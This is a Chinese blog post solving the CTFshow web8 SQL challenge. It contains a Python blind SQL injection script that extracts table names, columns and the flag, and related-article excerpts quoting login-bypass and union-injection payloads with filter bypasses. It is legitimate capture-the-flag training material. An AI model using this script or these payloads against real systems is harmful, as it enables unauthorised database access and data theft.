CTFshow8 SQL

最新推荐文章于 2024-05-11 09:59:45 发布
最新推荐文章于 2024-05-11 09:59:45 发布
阅读量106 收藏
点赞数
分类专栏: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sinat_31884905/article/details/117112798
版权 
# -*- coding: utf-8 -*-
"""
Created on Fri May 21 10:51:40 2021

@author: Administrator
"""


import requests
s=requests.session()
url='http://1774ea69-f82e-4a6b-825c-3e0becd685ab.challenge.ctf.show:8080/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        #payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break


https://blog.youkuaiyun.com/weixin_45253622/article/details/116571039?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_baidulandingword-0&spm=1001.2101.3001.4242
CTFshow之web6
世间繁华梦一出
05-07 2706
CTFshow——web6 一打开页面是用户名密码登录,我们首先第一个想到的就是sql注入了,来用万能钥匙试一哈! 报错了 然后,我在密码框里同样注入万能钥匙试了一下,发现,密码框中输入空格也会多一个黑点,于是我猜测可能是把空格过滤了,为了验证 我的猜想,来抓包看一下服务器收到的页面请求包最后传递的用户名和密码的参数值是什么样子的 抓包果然发现,空格被过滤了 一般空格被过滤有如下替换方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 我们就选用/**/来替
CTFSHOW web6
zoixsoadji的博客
03-23 5211
进入题目,发现页面和之前的web2一样,试试看万能密码登陆:username=admin' or 1=1#&password=123 不出所料,万能钥匙还是被ban了,试试看过滤了什么 测试发现,题目过滤了空格,那么我们就用/**/来绕过空格:username=admin'/**/or/**/1=1#&password=123 发现可以成功登陆,接下来老方法,测试有几个数据库:username=admin'/**/or/**/1=1/**/order/**.
CTFshow [web 6-8]
weixin_45253622的博客
05-10 392
web5 代码审计题型。 where is flag? <?php error_reporting(0); //关闭错误报告 ?> <html lang="zh-CN"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-w...
ctfshow-WEB-web6
热门推荐
wangyuxiang946的博客
08-21 1万+
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过 先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输 a'or(true)# 成功登录 既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用联合注入获取当前使用的数据库,用户名输入以下payload,密码随便输 a'or(true)union(select(1),datab...
ctfshow-萌新-web6( 利用二进制绕过获取网站敏感信息)
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web6关,这一关的考点是intval()函数转换字符串的特性,以及SQL注入漏洞的绕过方式,源码中过滤了单双引号,or,加减乘除号,叹号,异或,hex,select等关键字,推荐使用二进制绕过 页面中展示了部分源码,并提示我们 id=1000 时,就是flag 这里先上答案,payload如下 ?id=0b1111101000 接下来详细解释一下解题的思路,首先是利用intval()函数转换字符串的特性进行绕过 intval()函数...
ctfshowsql
01-11
### CTFShow 平台中的 SQL 挑战与教程 #### 了解SQL注入基础 SQL注入是一种常见的攻击方式,通过向应用程序输入恶意的SQL语句来操纵数据库。为了成功完成CTFShow平台上的SQL挑战,理解基本原理至关重要。通常情况下...
ctfshow 175sql注入
最新发布
02-20
### CTFShow 175 SQL 注入挑战分析 对于CTFShow平台上编号为175的SQL注入题目,重点在于理解如何利用已知漏洞来绕过安全机制并成功执行SQL命令。根据描述,index页面存在`password`字段上的SQL注入风险[^1]。 ####...
ctfshow web sql
08-23
因此,可以得出结论,ctfshow web sql竞赛是一个围绕web安全中的SQL注入漏洞进行的CTF竞赛。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* *2* *3* ...
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 2127
自用
CTFshow sql注入 上篇(web221-253)
Kradress的博客
04-20 4978
目录前言思路题解总结 前言 输入源码 思路 ################################ 题解 ################################ 总结 …
CTFshow-web-web6
qq_68581192的博客
10-09 175
获取到数据库中的表flag和user,我们去获取flag表中的所有字段,输入1’or(1=1)union(select(1),(select(group_concat(column_name))from(information_schema.columns)where(table_schema=‘web2’)and(table_name=‘flag’)),3)#发现登录成功了,我们再使用联合注入获取当前使用的数据库,输入1’or(1=1)union(select(1),database(),3)#
ctfshow-web6
aarong的博客
12-22 1688
如题又是登录框 先试试看看能不能登录 ' or 1=1# 发现出现了错误:sql inject error 用burp抓包发现,过滤了空格 空格被注释掉了,所以想办法把空格给替代掉 通过这篇文章得到注释的方法有两种,那就是注释符/* */和%a0 '/**/or/**/1=1# 发现可以登录: 接下来就是手工注入的流程了 order by 查询字段为3: username='/**/or/**/1=1/**/order/**/by/**/3#&password=123 回显的字段数
CTF.show:web6
qq_46230755的博客
01-15 491
登陆窗,先想到sql注入 抓包测试发现失败 利用/**/代替空格进行绕过 username=admin'/**/or/**/1=1#&password=123456 利用联合查询找到回显位置 username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=123456 查数据库名 username=admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3
CTF show WEB6
羽的博客
02-15 4101
1.尝试万能密码 username=admin’ or 1=1#&password=1 显示sql inject error,发现有字符被过滤。 逐个字符输入后发现过滤了空格,一般空格被过滤有如下替换方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 这里选择/**/ username=admin’/**/or/**/1=1#&passw...
CTF Show Web6
qq_62566956的博客
03-28 393
在上一题的wp中,看到了工具fzbk,使用之后发现所有备份文件都返回200= =,问了问群主之后发现这是nginx服务器的设置:遇到不存在的路径就直接跳转到默认的主页面,所以导致fzbk认为所有文件都可能存在。扫到备份文件之后直接访问,在www.zip中得到。解压源码到当前目录,测试正常,收工。因为fzbk有bug,再也不用了。直接访问txt文件即可。
ctfshow web6
博客地址 www.sec0nd.top
02-24 494
题目分析 题目是一个登陆页面,猜测可能是sql注入类的题目 尝试一下万能密码 username=admin'/**/or/**/1=1#&password=1 发现有过滤,要找出来是过滤了哪个字符,依次输入验证,发现是过滤了空格 那么就要绕过空格,有以下几种方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 详细见下面这篇文章https://blog.youkuaiyun.com/weixin_39945475/article/details/10990395
2024年最新ctfshow-WEB-web8_ctfshow web8,2024年最新全网首发
m0_54903333的博客
05-11 387
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。接下来进行脱库, 由于盲注脱库比较复杂, 此处我们构造Python脚本进行自动化脱库, 注意payload中的字符串不要换行, 否则可能会出问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。由以上返回结果可知, 该页面存在SQL注入, 注入点为。成功获取当前数据库名: web8。接下来获取获取数据库中所有表。因篇幅有限,仅展示部分资料。
CTF_ctfshow_web6
weixin_54227009的博客
05-13 522
过滤了空格 一般空格被过滤有如下替换方法 /**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 这里选择/**/ 1'/**/union/**/select/**/1,2,3# 回显为2 查看数据库名: 1'/**/union/**/select/**/1,database(),3# 查看表名: 1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_sc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值